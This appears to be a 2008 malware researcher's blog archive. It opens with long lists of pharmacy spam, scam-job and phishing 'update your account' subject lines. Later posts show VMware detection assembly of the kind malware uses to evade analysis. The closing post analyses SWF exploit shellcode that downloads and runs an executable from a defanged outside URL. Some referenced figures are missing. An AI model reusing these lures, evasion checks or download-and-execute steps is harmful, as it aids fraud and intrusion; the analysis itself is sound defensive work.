Time to be healthier.
Time to be thinner.
Time to live healthier life.
Tiny help for complete satisfaction.
Tips for Improving Your Love Life
Tips on love making issues
Tips to Keeping your Intimate Life Fun and Active
Tips to better health.
Tips to keeping your intimate life going.
Tips to nights of enjoyment.
Tips to perfect health
Tips to the best lovemaking experince you ever had
Tips to your perfection.
Tired of ED? Get the best treatment on the web.
Tired of been sick and tired, get all you need from our store.
Tired of looking for good chemists, online Canadian chemists is the best solution.
To men who want to act best in bed.
To those who look for perfect health.
Top news on male health
Top news on men improvement.
Top secret of most successful lovers have been discovered.
Touch her heart with your new babymaker.
Treat your male problems and increase your size and drive
Triple your pleasure and benefit from world know pilules.
Trivia question of perfect intimate living.
True way to be manlier.
Turn her dreams into fountain of pleasure.
Turn it to a magic stick of pleasure.
Turn it to a stick of pleasure.
Turn your any night to the night full of pleasure.
Turn your short and tiny stick to something you can be proud of!
Turn yourbedroom into paradise of pleasure.
Twenty-four hour online store with extensive health product information offers prescription filling online for pickup at stores.
US Licensed Health shop, 24h Shipping, NO RX required !
Ultimate pleasure supply, hot nights for 3 months.
Ultimate weight losing solution.
Unbelievable Savings on Medications.
Unbelievably healthy living, come to Canadian Chemists' site to claim it.
Undeliverable pleasure come to claim it.
Ur woman will be happy!
Urgent question of the night.
Urgent! Your health is at stake.
Use it for improving your love life.
Use the medications, everyone is using.
VPXL from Canadian Chemist. Your ultimate enhancing solution.
Vanish illnesses and pain from your life.
Wake up true desire in her.
Wanna be a MachoMan?
Wanna be a tough guy?
Wanna be good looking in two weeks?
Wanna drop few pounds quick?
Wanna have her 5 times a night?
Wanna live happier life?
Want a new boner? Nope, what u need is ablue pill!
Want harder weener that won't let you down soon after beginning?
Want to act in bed, like the guy from the movie you watchd yesterday?
Want to act like a pornstar? Take a bluepill!
Want to act like a pornstar? Take a bluepill!
Want to act like a xxxstart. Here is how.
Want to act like that Ppornstar from the movie u watched yesterday?
Want to be called Macho?
Want to be called Macho?
Want to beat your neighbours in love marathon?
Want to become the master of love making art?
Want to conquer her heart?
Want to forget about bad performance in bed?
Want to get harder and stay up longer? We know how.
Want to have fantastic nights?
Want to have such a tool like famous pornstars do?
Want to keep it up fast and simply? Ask us how.
Want to level up your lovemaking skill?
Want to make love everywhere? Ask us how.
Want to make pleasure more durable?
Want to win her attention?
Waste no time on useless exercise to gett of some kilos, there is better way.
Watch positive changes in your life.
Wave goodbuy to intimate problems
Wave goodbuy to intimate problems
Way to Make Your Night Life Last Longer and Be More Pleasurable.
We always have 40% lower prices fom your order.
We are helping Americans become happy and healthy day by day.
We are helping women boost their intimate relationship.
We are proud to be the largest chemists network all over the world.
We are sure that lengthening will help you boost your intimate life!
We are the first who made quality medications affordble.
We can solve all your intimate problems right now.
We can tell what really works!
We can tell what really works!
We collected best products for your health from all over the world.
We compared 10 most popular antieds, chech the results online.
We have a solution that already helped millions of mn et rid of their male problems.
We have everything to cure most common illnesses.
We have everything to cure your masculinity.
We have everything to make your love more passionate.
We have products for men's, women's and pet's health.
We have the answer how you can improve your health state.
We let all your wishes come true.
We offer a wide selection of the most popular medications online.
We offer the ultimate solution to all your love making problems.
We provide better cure of all your health problems.
We provide better solution than any local chemist.
We provide everything so you can live life to the full.
We provide everything to make your life healthy and perfect.
We provide you with a cost effective, convenient way of shopping for health items online.
We send you medications at half price.
We specialise in medicines & natural health remedies.
We specialise in natural health remedy.
We will fulfill your urgent medical needs.
We will teach you to be the master of making love art.
We'll show you how its possible to have a woman 10 times a day
Weight losing system as it should be.
Weight problems? The solution is near.
What ancients used to treat their bad health.
What can bring you more joy in intimate life?
What doctors dont want you to know.
What it would be like prolonging pleasure for 30 minutes.
What it would be like to have extra 4 inches?
What it would be like, having more health in 4 weeks, with ultimate improving supply?
What makes a stone even harder?
What she will never tell you.
What the doctors dont want you to know.
What to do for more pleasure at night?
What to take for better intimate life.
When travveling abroad, do not forget to put in your pocket on or to blu colored-tabs!
When you are aged and never give up, it gives your he confidence, at any chance , at any place.
When your hot gf is waiting for you, blue pilule will work the best.
When your wife is angry with you at nights
When your wife is angry with you at nights, dont loose hope to have good potence.
When your wife is angry with your bad potence.
Which one of enlarhing products really work?
Who says that wishes cant come true?
Who says that wishes cant come true?
Whole world popular, helping many people.
Why Canadian Chemists is so cheap.
Why control your desires and passion.
Why do you fall so weak and slow?
Why do you fall so weak and slow?
Why doctors will never tell you the easiest way to health.
Why is it falling when u need it up now?
Why is your love life such a disaster?
Why let bad potence spoil your nights.
Why most men cannot satisfy their women.
Why overpay for medications when you can save on them?
Why overpay, when you can save buying products from online chemists.
Why some can make love 7 times a day?
Why some people never let ED spoil their life? Here is their secret.
Why you should control your desire?
Why you should control yourself in bed?
Why your doctor is talking so much about canadian chemists.
Why your doctor is talking so much?
Wide assortment of products for health
Wide assortment of products for your health.
Wide range of enhancing products for boys and girls.
Wild nights lovers choose blue pilule.
Wild nights. 10 reasons to try absolutely new enhancing product.
Will you be able to please her 5 times a night?
Win from benefits of hidden secret of pornstars!
Win your victory in bed
Wiping away shelves with medications this summer.
Wishing to act longer in bed?
With all your faults she loves you still, cause you use right antiEDs.
Women will not tell you what really works, but we do. BLuepill works. Always.
Women will not tell you what really works, but we do. BLuepill works. Always.
Wonderful enhancing effect on your manhood.
Wondering How to Deal with Intimate Problems?
World famous medical products at discount.
World known medicaments at huge discounts.
World largest selection of medical products for men and women.
World of health, 80% cut.
World of pilules, up to 70% cut.
World's most trusted online chemists on the market is now open for you.
Worlds largest selection of male and female enhancing products
Would you like to become her number one?
Would you like to spicy your nights with gf?
XXXstars revealed their secrets.
You always wanted to know, how to prolonge pleasure in bed.
You can feel and act more confident in bed.
You can trust us your health, we know how to improve it.
You dont need luck if you take blue pilules.
You have been awarde an ultimate enhancer.
You have been granted a perfect source of better intimate living.
You have never thought that this could change urlife for better.
You vicory in love.
You were born to become her best lover.
You will know the true feeling of making love.
You wont be humiliated by girls anymore.
You wont disappoint ehr this night.
You wont forget nights after taking antiEDs.
You wont need to worry about your performance in bed anymore.
You'll for sure will be more manly.
Your Health Professional on the Internet.
Your demand for healthier living has been reviewd.
Your direct secret source of perfect xxxlife.
Your every night will be full of passion
Your friends will be amazed with all your chixs!
Your friends will be amazed with all your chixs!
Your good health is our goal.
Your happiness in love is not far away.
Your happy and healthy life is our goal.
Your healh
Your health consultant on Internet.
Your health is in your own hands.
Your health is our store main goal.
Your health wont go wrong.
Your i-health consultant.
Your intimate condition is our specialization.
Your intimate happiness is not far away.
Your intimate life assistant.
Your intimate life helper.
Your intimate source of pleasure.
Your new dedicated chemist shop.
Your new intimate life is awaiting for you.
Your new source of great health.
Your new time spending with your wife.
Your new time spending with your wife.
Your one and only online Chemist.
Your problems will be vanished as well as your weight.
Your recipe for successful intimate living.
Your recipe for successful love
Your recipe for unmatching lofe making.
Your recipe is ready.
Your shy will be vanished along with overweight.
Your supplier of successful lovemaking.
Your wife will notice that for sure.
canadian Chemists, for people who are shy to buy antiEDs at local stores.
hey, have you seen this chemists, that covers all needs?
learn how to make your gf happier.
make love with her easily
quicker,safer,cheaper online chemiststore.
related information.
restore your love life injust a few minutes
we have all the cures to make your life perfect.
who said your wishes cant come true.
you will be crazy lost in love.
your number one potence ensurer!

> FBI and Facebook conspiracy theory spam mail <

F.B.I. Facebook Crime Survey
F.B.I. Facebook Records
F.B.I. Looks Into Facebook
F.B.I. Watching Hezbollah in Facebook
F.B.I. Watching Possible Terrorists on Facebook
F.B.I. agents patrol Facebook
F.B.I. are spying on your Facebook profiles
F.B.I. busts alleged Facebook
F.B.I. bypasses Facebook to nail you
F.B.I. can watch our conversation through Facebook
F.B.I. may strike Facebook
F.B.I. on the Hunt for Facebook users
F.B.I. tries to fight Facebook
F.B.I. wants instant access to Facebook
F.B.I. watching us
F.B.I. watching you
FBI Facebook Crime Survey
FBI Facebook Records
FBI Looks Into Facebook
FBI Watching Hezbollah in Facebook
FBI Watching Possible Terrorists on Facebook
FBI agents patrol Facebook
FBI are spying on your Facebook profiles
FBI busts alleged Facebook
FBI bypasses Facebook to nail you
FBI can watch our conversation through Facebook
FBI may strike Facebook
FBI on the Hunt for Facebook users
FBI tries to fight Facebook
FBI wants instant access to Facebook
FBI watching us
FBI watching you
Facebook Coming Under F.B.I. Scrutiny
Facebook Coming Under FBI Scrutiny
Facebook's F.B.I. ties
Facebook's FBI ties
Get Facebook's F.B.I. Files
Get Facebook's FBI Files
The F.B.I. has a new way of tracking Facebook
The F.B.I.'s plan to "profile" Facebook
The FBI has a new way of tracking Facebook
The FBI's plan to "profile" Facebook

> Non english <

Ingreso adicional para usted! 470 eur por semana.
Necesitamos de los empleados en su ciudad.
Euros adicionales por semana. Trabajo a distancia.
Le proponemos aumentar sus ingresos por la suma de 600 Euros por semana.
Tan solo 54 lugares vacantes . ? Es su oportunidad !
Invitamos a trabajar !
El puesto de trabajo es para usted!
Esta semana 78 puestos!
Quiero ofrecerle el trabajo en la empresa global.
89 del % de las personas no estan satisfechos con sus ingresos. Le ofrecemos una salida.
Le ofrecemos la oportunidad de ganar hasta 800 Euros por semana adicionalmente.
Ha quedado 41 puestos de trabajo en la corporacion global.
Necesitamos empleados en su barrio.
Nuestra propuesta suena interesante para 87% de la poblacion.
Usted necesita + 600 Euros por semana?
Si le interesa un ingreso adicional - no pierda esta oportunidad!
520 eur extra alla settimana. Lavoro a distanza.
Assumiamo in societa in fase di sviluppo.
Guadagni extra! 4500 al mese
Il lavoro in gruppo forte per voi!
Investendo 4 ore alla settimana potete guadagnare 520 Eur.
Molto importante! Questa settimana 73 opportunita d'impiego.
Restano a disposizione rimasti solo 73 posti liberi. Non lasciatevi sfuggire l'occasione!
Ricerchiamo collaboratori in vostra citta.
Vi offriamo la possibilita di incrementare la vostra entrata
Che sia amici si rallegrano che i nemici invidiano!
Chi ha detto, che il studente deve essere povero? Il studente puo` essere ricco!
Come combattere i prezzi che aumentano su alimentari?
Come raggiungere il successo? Stai in compagnia con interessanti persone.
Ditta Sony invita i studenti.
Durante lo studio, si puo` trovare favorevole affare perche sia stato piu` allegro.
Fare buoni cose e guadagnare - e` possibile? Per noi e` importante il Suo parere!
Lei e` all'inizio della grande via? Faccia primo passo.
Nel mondo c'e troppo male male. Faccia giusto atto e ottiene la ricompensa.
Quale studente ha carta Visa di platinocon credito di 50 mila? Il nostro studente lo ha!
Se si puo` iniziare a creare la carriera durante lo studio? Si!
Stufato del lavoro? C'e anche utile affare!
Tra gli esami si puo` non solo studiare pero` anche fare le cose interessanti.
Sichere Arbeitsplatze
Guter, leistungsorientierter Verdienst
Selbststandige Arbeit
Gut bezahlter Job bei freier Zeiteinteilung
Internationale Geschaftskontakte

> Notifications <

Attention - Important Customer Information
Attention - Important Customer Notification
Attention - Important Notification
Attention - Update your account
Auto-Generated Notification
Auto-Generated Notification - Update your account
Auto-Generated Notification - Your account is about to expire
Important Notification
Important Notification - Update your account
Read carefully - Important Customer Information
Read carefully - Important Notification

> Job hiring <

open position
supply manager vacancy
supply manager needed
manager needed

... stay safe guys ...

Thursday, August 21, 2008

File format ...

Reference ....

Microsoft Office Binary (doc, xls, ppt) File Formats

Nothing new ... ;)

Thursday, August 14, 2008

Old virus descriptions

Nothing new ...

just found this old virus description ... LOLz

Other threat names so memorable to me ...




When FakeAlert dates back to 2004 ...

Sunday, July 20, 2008


before it was xpantivirus ... then it became antivirusxp2008


Friday, July 11, 2008

very busy second half of the year ...

some random thoughts ....

* my resignation in PC Tools is effective last week . . .
* started my new job in CA ...

First virus description ....


* we are moving in our new apartment tomorrow . . .
* my wife loved the place because of the huge closets . . .

Tuesday, June 24, 2008

Notes for me .. in case i forgot where to find it ...

When you are searching for something ... you need to have the right keywords for it ...

Like for example I've read a very informative Microsoft TechEd document titled
"Writing Secure Native Code with Visual C++" a couple of years ago.

I'd been searching for a long time ... just to find out that it is not available online ... hehehhe

some excerpt

By default, the older less-secure C runtime functions are declared to be deprecated in the C runtime library header files using the __declspec(deprecated) extended attribute syntax. To turn off the deprecation warnings for the older, less secure functions, you may define the macro _CRT_SECURE_NO_DEPRECATE. Alternatively, you may use the #pragma warning to disable individual warnings.

#pragma warning (disable:4996)

Many of the new C runtime functions check incoming parameters for validity. Parameter validation includes checking for NULL pointers, checking that integral values are within valid ranges, and checking for valid enumeration values. If a problem is detected by the function, an invalid parameter handler is automatically called by the runtime library. The default invalid parameter handler provided by the C runtime raises and Access Violation exception. In Debug mode, an assertion is also raised.

The runtime library provides a function, __set_invalid_parameter_handler so that you may install your own function to respond to input parameter errors. Your function may terminate the application, or it may return control to the calling function that received the invalid parameters. The calling function will normally discontinue execution and set errno to an error code such as EINVAL to indicate invalid parameters. The calling function may use more specific values for errno, such as EBADF to indicate a bad file pointer was detected.

Another site that I always use for reference is the site below ... for VMWare and Virtual PC detection stuff

/* in Intel syntax (MASM and most Windows based assemblers) */
MOV EAX, 564D5868h /* magic number */
MOV EBX, command-specific-parameter
MOV CX, backdoor-command-number
MOV DX, 5658h /* VMware I/O Port */

/* in AT&T syntax (gnu as and many unix based assemblers) */
movl $0x564D5868, %eax; /* magic number */
movl command-specific-parameter, %ebx;
movw backdoor-command-number, %cx;
movw $0x5658, %dx; /* VMware I/O port */
inl %dx, %eax; (or outl %eax, %dx)

and also this one

Wednesday, June 18, 2008

What is so wrong with this? ...

These guys are so desperate .... :(

Well I installed Zango ... and after that all hell breaks loose ... pop ups all you want.

After that I went to rapidshare .. and got this message box ...

At first I thought it came from rapidshare but seeing that small IE box makes me suspicious.
(Well it did not came from rapidshare ... )

After I chose Cancel .... Then I am NOT surprised that it STILL run
(I know it is just an animation ehehhe ... but for a normal user they may think that it is really running ... and detecting malwares on my machine .... so deceiving)

Lucky for me ... I am running in a virtual environment ...

By the way, Boston Celtics are now 2007-2008 NBA Champions

Go Greens!!!

Friday, June 13, 2008

Moving hard disk with Windows XP into another machine

Just another note for me.

When using a mobile rack and your hard drive contains a Windows XP OS, you can follow these instructions so you will not encounter any error moving on another machine.

From Micro$oft support ...

I will repost the contents of the URL here in case they remove it from that URL.
This article helped a lot of analysts that I know....


Microsoft support article

You receive a Stop 0x0000007B error after you move the Windows XP system disk to another computer


This article describes how you may receive a Stop error when you try to start the Microsoft Windows XP-based backup computer after you move the system disk to a backup computer. This issue occurs when registry entries and the drivers for the mass storage controller are not installed in Windows XP. To resolve this issue, use the same hardware in the backup computer.


After you move the Microsoft Windows XP system (boot) disk to a backup computer, you may receive the following Stop error when you try to start the Windows XP-based backup computer:
STOP: 0x0000007B (0xF741B84C,0xC0000034,0x00000000,0x00000000)


This error may occur if the registry entries and the drivers for the mass storage controller hardware in the backup computer are not installed in Windows XP.

For integrated device electronics (IDE) controllers, there are several different chip sets available, such as Intel, VIA, and Promise. Each chip set has a different Plug-n-Play identifier (PnP-ID).

The PnP-ID information of mass storage controllers for the backup computer must be in the registry before startup so that Windows XP can initialize the correct drivers.


To resolve this error, use the same hardware for the backup computer:
Replace the problem hardware components in the backup computer with components of the same manufacturer, make, and model as the motherboard in the computer that you are backing up.
If the system disk is a SCSI disk, use the same make and model of SCSI controller in the new computer.
If the system disk is an IDE disk, use the same kind of motherboard in the new computer, a motherboard that has the same kind of IDE chip set and the same PnP-ID as the motherboard in the computer that you are backing up.
For SCSI-based system disks, you can prime the registry and make sure that the drivers that you want are in place by installing the SCSI controller that is used by the backup computer before you transfer the system disk contents. Windows XP PnP detects the controller, sets up critical registry entries, and copies the appropriate driver.

After you see the SCSI controller in Device Manager, you can remove the alternate controller. If you have to move the system disk to another computer that has the same make and model of SCSI controller in the future, Windows XP will start successfully because Windows XP has already used that controller one time and has retained the correct configuration information.


Although Microsoft does not support this method, you can import or merge the required registry entries, and copy the drivers beforehand to support all IDE controllers that are natively supported by Windows XP. Note that although this method might enable the relocated system disk to start successfully, other hardware differences can lead to other problems.

This solution provides support for IDE controllers whose PnP-ID matches one of the PnP-IDs in the following list. However, if you want to determine beforehand the IDE controllers that are used in your current and backup computers, you can search the %SystemRoot%\Setupapi.log file for the PnP-ID that is detected while the Setup program is running.

After you determine the PnP-IDs that are used in your computers, you can choose to merge or to populate the registry with only the PnP-IDs that you need.

The following list shows the PnP-IDs of natively supported IDE controllers in Windows XP:

   ;*********** Standard IDE ATA/ATAPI Controllers *********

;*********** Generic ESDI Hard Disk_Controller **********

;*********** Aztech IDE Controller **********************

;*********** Device ID for Generic Dual PCI IDE *********

;************ALI IDE Controller ******************************

;************Appian Technology **************************

;************CMD Technology *****************************

;************Compaq *************************************

;*************Intel *************************************

;*************PC Technology *****************************

;*************Silicon Integrated System *****************

;*************Symphony Labs *****************************

;*************Promise Technology ************************

;*************VIA Technologies, Inc. ********************

;*************Standard Microsystems Corp. ***************

;*************Toshiba ***********************************

To import this information, follow these steps on two different test computers that exhibit the Stop 0x0000007B error after you change disks between computers. After you follow this procedure on each test computer, you can probably move the hard disks and start both computers without receiving the Stop 0x0000007B error. However, other hardware differences can cause other problems.
1.Copy the following information into Notepad, and then save the file on a 3.5-inch disk. Name the file Mergeide.reg, without the .txt file name extension.

********** Start copy here **********
Windows Registry Editor Version 5.00
































;Add driver for Atapi (requires Atapi.sys in Drivers directory)

"Group"="SCSI miniport"
"DisplayName"="Standard IDE/ESDI Hard Disk Controller"

;Add driver for intelide (requires intelide.sys in drivers directory)

"Group"="System Bus Extender"

;Add driver for Pciide (requires Pciide.sys and Pciidex.sys in Drivers directory)

"Group"="System Bus Extender"
********** End copy here **********

2.Extract the Atapi.sys, Intelide.sys, Pciide.sys, and Pciidex.sys files from the %SystemRoot%\Driver Cache\I386\ file, or copy the files to the %SystemRoot%\System32\Drivers folder.
3.In Microsoft Windows Explorer, right-click the Mergeide.reg file in the floppy drive, and then click Merge.

Windows XP displays the following message:
Are you sure you want to add the information in A:\Mergeide.reg to the registry?
Click Yes.

After the import process is completed, Windows XP displays another message:
Information from A:\Mergeide.reg was successfully entered into the registry.
4.Quit Windows XP, turn off the computer, and then move the system disk to the other test computer, the one that previously produced a Stop 0x0000007B error, and then test to see if you can successfully start the second computer.


Saturday, June 7, 2008

Analysis of the shellcode of SWF Exploit CVE-2007-0071

After the decryption code, it will search for the base address of kernel32.dll to get the addresses of the APIs that it will need.

As shown in the illustration it uses the Process Environment Block (PEB) to get the kernel32.dll's base address.

Here is a great explanation on PEB.

It goes to fs:[30] as its entry point to the PEB.

Here is a very good reference where the values in fs points to. Basically it is more of the Thread Information Block (TIB).

Once it gets the base address of kernel32.dll in memory, it will get all the API addresses it needs in the export address table.

kernel32.dll base address in XP is 77E60000.
(I reckon it depends on the version of XP, I will double check on this in a few days.)

So below is a list of APIs that it gets



It will also get the import table address. In this case it gets API addresses from the imported DLL of kernel32.dll, which is ntdll.dll.

It gets the addresses of the following APIs

NtCreateProcessEx - ntdll.ZwCreateProcessEx
NtWriteVirtualMemory - ntdll.ZwWriteVirtualMemory

Below you can see that it calls kernel32.LoadLibraryA API to load the urlmon.dll.
It used the JMP instruction instead of a direct CALL instruction to the API.

When this is debugged and you go inside kernel32.dll, you will see this in the stack.

It finds the address of the API urlmon.URLDownloadToFileA in urlmon.dll.

Then it changes the memory protection on the address of ntdll.ZwCreateProcessEx, ntdll.ZwWriteVirtualMemory and kernel32.CreateProcessInternalW to PAGE_EXECUTE_READ.

Then it gets the temporary path of the system and deletes the file orz.exe in the temporary path of the system to make sure the file will be the latest version.

In the figure below you can see that it calls the API urlmon.URLDownloadToFileA with the following parameters

HRESULT URLDownloadToFile(
LPCTSTR szFileName,
DWORD dwReserved,
Relevant values

szURL = hxxp://mmlan . com . cn / mm . exe
szFileName = C:\DOCUME~1\username\LOCALS~1\Temp\ orz.exe

Then it executes the file using the kernel32.CreateProcessInternalA API.

That's it.

Enjoy your weekend.